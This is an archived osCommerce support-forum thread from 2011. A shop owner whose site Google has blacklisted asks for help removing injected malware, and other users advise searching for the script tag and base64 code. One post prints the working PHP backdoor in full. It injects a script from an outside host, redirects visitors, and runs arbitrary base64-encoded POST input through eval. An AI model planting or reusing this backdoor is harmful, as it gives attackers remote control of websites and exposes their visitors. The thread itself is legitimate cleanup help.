labmais Posted November 7, 2011 Posted November 7, 2011 Hello, my website has been classified as malware website since one or two weeks ago. http://estereomicroscopio.com.br/ I tried to clean it in many ways. Anyone know what can be did to solve it? ANOTHER QUESTION When I go in some categorie, I get a link like this: http://estereomicroscopio.com.br/catalogo/banho-maria-c-64.html The question is: how is this link generated? I checked my files but there aren't such .html file. Is it stored anywhere? E-commerce? No external links please.
MrPhil Posted November 7, 2011 Posted November 7, 2011 You have some sort of "SEO" add-on/mod installed, that generates URLs that look like that. There are no ".html" files in osC, so stop looking for them. Everything is generated by PHP, with a fake name of .html for SEO purposes (hides the underlying technology). As far as cleaning up your site from the malware infection, it's obvious that you're missing something, as you don't understand anything about how your site works. Look around for posts explaining the ways that sites can be secured, and how to clean them up once infected. I seem to recall that "germ" and "Dunweb" have posted on this subject many times, so you might start by searching for their postings.
labmais Posted November 7, 2011 Author Posted November 7, 2011 Thanks for answer Phil. I'm asking to know where I can see the supposed .html file, because I received a report saying that this url is infected: http://estereomicroscopio.com.br/catalogo/estufas-c-63.html If I can check this URL code, I can get rid off the infection. Does what I'm looking for inside the DB? E-commerce? No external links please.
Guest Posted November 7, 2011 Posted November 7, 2011 Rafael, You have to check ALL of the files in your osCommerce installation and remove ALL malicious code and anomalous files. As Phil stated, there are NO HTML files in osCommerce. Chris
labmais Posted November 7, 2011 Author Posted November 7, 2011 I see Chris and I'm grateful for your help. I received a report from Google. GOOGLE REPORT URL: http://estereomicros...tufas-c-63.html [/left] Last checked: November 3, 2011[/left] Suspected injected code Instances <script src=http://infocenc.com.br/js/> [/left] It says that there is a malicious code on it right?? How can I fix this specific reported URL? About checking all files...There is no problem to do that, but how can I do that? If I check all the files, what I need to look for? E-commerce? No external links please.
Guest Posted November 7, 2011 Posted November 7, 2011 Rafael, Check all of your files for this: <script src=http://infocenc.com.br/js/> OR, a base64 script line. Once your site has been cleaned and secured, you can then contact Google to remove your site from the blacklist. Chris
labmais Posted November 7, 2011 Author Posted November 7, 2011 Two things: 1st- I have already checked all files and all DB tables for the mentioned script. Found only one result and it was inside the DB. More specifically in the configuration table. 2nd- I have really saw a base64 script but it seemed to be ok and I didn't touched it. So the base64 is bad code? The report mentioned this url too as damaging inside my website: drcutrapalis.orge.pl base64 code <?php global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200); echo "<script src='$sessdt_u'></script>"; echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} } #/* header("Location:catalogo/"); #*/ function decode_pwd($pwd) { $pwd = preg_replace("/TmE=|Q2w=/","",base64_decode($pwd)); return base64_decode($pwd); } $config = file("config.txt"); foreach($config as $key => $value) { $config[$key] = trim($value); } $title = $config[0]; $keywords = $config[1]; $description = $config[2]; $catalog = $config[3]; $addr = $config[4]; $server_addr = $config[5]; $server_user = $config[6]; $server_pass = decode_pwd($config[7]); $server_db = $config[8]; ?> E-commerce? No external links please.
MrPhil Posted November 7, 2011 Posted November 7, 2011 If it's not in the base osC code, then yes, it's bad. I don't have the code available to compare against right now, but the code you listed above certainly doesn't look like it belongs in osC. After removing it, you've only begun the battle. You have to figure out how the hacker might have gotten in and planted that code, and then seal up all the holes in your site. Germ and DunWeb have posted a lot on that section, so go looking there.
labmais Posted November 7, 2011 Author Posted November 7, 2011 Ok I will. Only one last question. All base64 code should be deleted?? I will do another search on my files. I guess that the "hacker" could get in by "opened door" in the upload image system. E-commerce? No external links please.
Guest Posted November 7, 2011 Posted November 7, 2011 Rafael, Not necessarily, there are some instances (especially with payment modules) that the base64 function is used to hide information for security reasons. Chris
labmais Posted November 7, 2011 Author Posted November 7, 2011 Ok, I get it, i have to be careful... What about this specifically code that I showed? Is it bad or good code? Thanks E-commerce? No external links please.
Taipo Posted November 7, 2011 Posted November 7, 2011 Once you have cleaned out your site then have a quick look at this page http://www.oscommerce.com/forums/topic/375288-updated-security-thread/ There are a number of recommendations in there that will help you not to get reinfected again. - Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)- Another discussion about infected files ::here::- A discussion on file permissions ::here::- Site hacked? Should you upgrade or not, some thoughts ::here::- Fix the admin login bypass exploit here- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX
thieule Posted December 9, 2011 Posted December 9, 2011 You can remove it in database. In table configuration.
Recommended Posts
Archived
This topic is now archived and is closed to further replies.